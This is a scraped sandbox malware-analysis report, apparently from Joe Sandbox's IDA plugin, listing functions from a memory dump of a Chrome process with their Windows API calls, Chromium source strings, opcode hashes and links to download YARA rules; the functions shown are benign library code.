Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: CurrentThread$AcquireAddressDebuggerExceptionExclusiveHandleLockModulePresentProcRaise
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Kernel32.dll$SetThreadDescription
API String ID: 1876178700-2641643690
Opcode ID: 154d8dec92db533b4a2394fe5027c8b8c78a26c57f3bd2121bc65e44cde3d049
Instruction ID: fb7f868005db72e01a933b990f24bf9dd40483857c9e5ebee2f7d4ef01499759
Opcode Fuzzy Hash: 154d8dec92db533b4a2394fe5027c8b8c78a26c57f3bd2121bc65e44cde3d049
Instruction Fuzzy Hash: C9513D65E09A8395FB549B21E9502B923A1EF60BC4F444235F91EC33A4EFACF54DE320

Function 00007FF63EDFAD20 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF63EDFAD64
SetLastError.KERNEL32 ref: 00007FF63EDFAD90
GetLastError.KERNEL32 ref: 00007FF63EDFADA0
SetLastError.KERNEL32 ref: 00007FF63EDFADCA
GetModuleHandleW.KERNEL32 ref: 00007FF63EDFAE55
GetProcAddress.KERNEL32 ref: 00007FF63EDFAE65
GetModuleHandleW.KERNEL32 ref: 00007FF63EDFAE9A
GetProcAddress.KERNEL32 ref: 00007FF63EDFAEAA

Strings

GetHandleVerifier, xrefs: 00007FF63EDFAE5B, 00007FF63EDFAEA0

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorLast$AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1762409328-1090674830
Opcode ID: 8e9dfe6d9e4e1bf7b4335dc2c1cbf4409eec5ca241d353230f364f13ce35fcf3
Instruction ID: af16a851fe86f3c1924b9df82ff8abaaf9d04766aaff54a0560fe19de1793ded
Opcode Fuzzy Hash: 8e9dfe6d9e4e1bf7b4335dc2c1cbf4409eec5ca241d353230f364f13ce35fcf3
Instruction Fuzzy Hash: F651ED25B09A0286EB24DB25E45437D67A1EF64B41F448639E64EC37A0DFBDF44EE220

Function 00007FF63EDFA8D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF63EDFA90C
GetCurrentProcess.KERNEL32 ref: 00007FF63EDFA912
DuplicateHandle.KERNEL32 ref: 00007FF63EDFA933
GetLastError.KERNEL32 ref: 00007FF63EDFA94E
SetLastError.KERNEL32 ref: 00007FF63EDFA976
GetModuleHandleW.KERNEL32 ref: 00007FF63EDFA9CA
GetProcAddress.KERNEL32 ref: 00007FF63EDFA9DA
GetLastError.KERNEL32 ref: 00007FF63EDFAA10

Strings

GetHandleVerifier, xrefs: 00007FF63EDFA9D0

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorLast$CurrentHandleProcess$AddressDuplicateModuleProc
String ID: GetHandleVerifier
API String ID: 2392487275-1090674830
Opcode ID: 7b506e1c3b312edd385a00258bcf5ab7043c291c3ba138b61364e127a71d91c6
Instruction ID: a947b2bd6962dff6adc034c769bbdf32184feb9a41ccbb36c98865d11d34cf14
Opcode Fuzzy Hash: 7b506e1c3b312edd385a00258bcf5ab7043c291c3ba138b61364e127a71d91c6
Instruction Fuzzy Hash: 88316035A09A4381FB14DB51B84433A67A1BFA4F80F854639F94EC33A4DE7DE44EA220

Function 00007FF63EE8E7F0 Relevance: 15.2, APIs: 10, Instructions: 212COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E88C
WakeAllConditionVariable.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E89E
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E8A7
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E8B0
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E8DC
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E939
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E953
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF63EDBB337), ref: 00007FF63EE8E99B

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release$ConditionVariableWake
String ID:
API String ID: 2824607059-0
Opcode ID: fcf635852f5b2a1f0e68d6330c1a81ce4c4514839c56d13be8280c87a693a354
Instruction ID: 95d9d198e1ccab1b4f65816fa91a719d71dce2b6519e481a24891ce51f89e0ce
Opcode Fuzzy Hash: fcf635852f5b2a1f0e68d6330c1a81ce4c4514839c56d13be8280c87a693a354
Instruction Fuzzy Hash: 11819126A09A4286EB559F11DC103793760FF60F95F084475FE0E973B4CEBDE449E262

Function 00007FF63EDC5290 Relevance: 15.2, APIs: 10, Instructions: 169COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,00007FF63EDBBA1F), ref: 00007FF63EDC52C5
WakeAllConditionVariable.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC52D7
ReleaseSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC52E0
TryAcquireSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC52E9
ReleaseSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC5317
TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,00007FF63EDBBA1F), ref: 00007FF63EDC536C
ReleaseSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC5386
AcquireSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC5394
AcquireSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC53A2
AcquireSRWLockExclusive.KERNEL32(?,00007FF63EDBBA1F), ref: 00007FF63EDC5445

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release$ConditionVariableWake
String ID:
API String ID: 2824607059-0
Opcode ID: 602040b810bb270ab2a755297320465e3e6b28db7b1482a9b188cb5049921afe
Instruction ID: 060769bed89b1b6278418c81a47dd4ff3cb93d057dcfddfc4c7dbcbc81b475fb
Opcode Fuzzy Hash: 602040b810bb270ab2a755297320465e3e6b28db7b1482a9b188cb5049921afe
Instruction Fuzzy Hash: 66519D25F1DA0286EE55DB1298046392761FF74BC6F484635FD4E87394CE7DE44AA320

Function 00007FF63EDC08F0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 341COMMON

Download Yara Rule

Strings

CreateAndOpenTemporaryFileInDir, xrefs: 00007FF63EDC0A7E
..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF63EDC0A12
..\..\base\files\file_util_win.cc, xrefs: 00007FF63EDC0A85
ScopedBlockingCall, xrefs: 00007FF63EDC0ED7
%08x-%04x-%04x-%04x-%012llx, xrefs: 00007FF63EDC0C69

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID:
String ID: %08x-%04x-%04x-%04x-%012llx$..\..\base\files\file_util_win.cc$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$CreateAndOpenTemporaryFileInDir$ScopedBlockingCall
API String ID: 0-577886094
Opcode ID: 437cb866f2b00d5b7e7248605aac4ee1b59d5bea11a6b44c4d471a0841ba12c9
Instruction ID: 17b0d7dad09d88ef4e581ffa6579ab99de442fb8084e2be5f8d5cb9fa759a98c
Opcode Fuzzy Hash: 437cb866f2b00d5b7e7248605aac4ee1b59d5bea11a6b44c4d471a0841ba12c9
Instruction Fuzzy Hash: CAE18E22F09AC281EB318B15F5403BAA3A0FFA5794F044231EA8C87B95DF7DE199D710

Function 00007FF63EDB1960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 112COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF63EDB1A52
ReleaseSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF63EDB1A8B
AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 00007FF63EDB1AD6

Strings

ScopedAllowBaseSyncPrimitivesOutsideBlockingScope, xrefs: 00007FF63EDB1AEF, 00007FF63EDB1B3C
..\..\base\task\sequence_manager\work_tracker.cc, xrefs: 00007FF63EDB19DE
E, xrefs: 00007FF63EDB1B5F
WaitNoSyncWork, xrefs: 00007FF63EDB19D7

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\base\task\sequence_manager\work_tracker.cc$E$ScopedAllowBaseSyncPrimitivesOutsideBlockingScope$WaitNoSyncWork
API String ID: 1678258262-2415033031
Opcode ID: 6f002bc012eb3f2abc82f64895baaa89af231c2530ca4ab2b515b2ef2fc004b4
Instruction ID: 41a952a5be5f366f968d822cf4b023b2fdab0bc8ae10a8e72793465c6e876bd3
Opcode Fuzzy Hash: 6f002bc012eb3f2abc82f64895baaa89af231c2530ca4ab2b515b2ef2fc004b4
Instruction Fuzzy Hash: 0251A331B08B8681EB208B15E4503BA73A0FFA5B94F544236EA9D87794EF7DE04ED710

Function 00007FF63EDCE880 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF63EDCE91A
CloseHandle.KERNEL32(?,?,?,?,-7FFFFFFFFFFFFFFF,00007FFE2167ADA0,?,000003E8,00007FFE21675C10,?,?,?,00007FF63EF33147), ref: 00007FF63EDCE959
GetLastError.KERNEL32(?,?,?,?,-7FFFFFFFFFFFFFFF,00007FFE2167ADA0,?,000003E8,00007FFE21675C10,?,?,?,00007FF63EF33147), ref: 00007FF63EDCE961

Strings

create_thread_last_error, xrefs: 00007FF63EDCEA7D
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EDCEA45
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EDCEA58

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: CloseCreateErrorHandleLastThread
String ID: ..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$create_thread_last_error
API String ID: 747004058-2499615631
Opcode ID: 4edb9982dfc1ff16ac9b0981a3e541cb33d27d15361071aae8737b8a37ec8200
Instruction ID: 4c5b6607bd913e57784e41f1f918529fc972a5f06d0598a0e843721431f72d1e
Opcode Fuzzy Hash: 4edb9982dfc1ff16ac9b0981a3e541cb33d27d15361071aae8737b8a37ec8200
Instruction Fuzzy Hash: C251BF62F0DA0285FA61AB15E8402B96690AFA4790F440235FD4EC37A5DEBCF44DE321

Function 00007FF63EDC0330 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF63EDC0390
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF63EDC028D), ref: 00007FF63EDC03D7
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF63EDC028D), ref: 00007FF63EDC0420
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF63EDC028D), ref: 00007FF63EDC0430

Strings

GetThreadDescription, xrefs: 00007FF63EDC0426
Kernel32.dll, xrefs: 00007FF63EDC0419

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressCurrentFreeHandleLocalModuleProcThread
String ID: GetThreadDescription$Kernel32.dll
API String ID: 4205643583-415897907
Opcode ID: 18df0e3b521a01ac664039f2d608853dc77d84bcd1a636cef82c2e8f479e94df
Instruction ID: fc95401522f75ec3a774ce0f6d0142075fc53d4a94e00e549ea747502fa39b0c
Opcode Fuzzy Hash: 18df0e3b521a01ac664039f2d608853dc77d84bcd1a636cef82c2e8f479e94df
Instruction Fuzzy Hash: 5E314F35F0CA0286EB10AB56F95427B63A1AFA4BD4F400235F90DC3765DE6DE54EE720

Function 00007FF63EE62AD0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE62B9B
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE62CA4
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE62CF9
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE62D0F

Strings

first, xrefs: 00007FF63EE62E44, 00007FF63EE62E75, 00007FF63EE62EA9

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: first
API String ID: 17069307-2456940119
Opcode ID: fb0c75a7b5f419db29a0c27ebce577e03f2cb546b9f9863034d50c30d56048da
Instruction ID: fd9172cbf29355928d679f10513680248ea73080808d1d50db75b40e0000149a
Opcode Fuzzy Hash: fb0c75a7b5f419db29a0c27ebce577e03f2cb546b9f9863034d50c30d56048da
Instruction Fuzzy Hash: 24B10822A08A9285EB558F25C4053BA77A0FF69B84F148031FF4D87794DFBCD55AE360

Function 00007FF63EDB11F0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 257threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF63EDB1215
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF63EDB102C), ref: 00007FF63EDB1220
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF63EDB102C), ref: 00007FF63EDB13B3
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF63EDB102C), ref: 00007FF63EDB158A

Strings

..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF63EDB159C

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$CurrentReleaseThread
String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
API String ID: 1385397084-2888085009
Opcode ID: fe84cfcab056a2d9951742981c424e767ffcb1a7fe9b9e2656dcfbe40596f73b
Instruction ID: bda39587e447fe2c0bac868c147196b39305913f2334456d31e39e9c865c6777
Opcode Fuzzy Hash: fe84cfcab056a2d9951742981c424e767ffcb1a7fe9b9e2656dcfbe40596f73b
Instruction Fuzzy Hash: 5DB17162E09B4385EA20DB12D44427A77A0FB65BC4F454236EE4F87795EF7CE048E320

Function 00007FF63EE7FC80 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 177libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF63EE7FEB7
GetProcAddress.KERNEL32 ref: 00007FF63EE7FECC

Strings

bcryptprimitives.dll, xrefs: 00007FF63EE7FEB0
ProcessPrng, xrefs: 00007FF63EE7FEC2
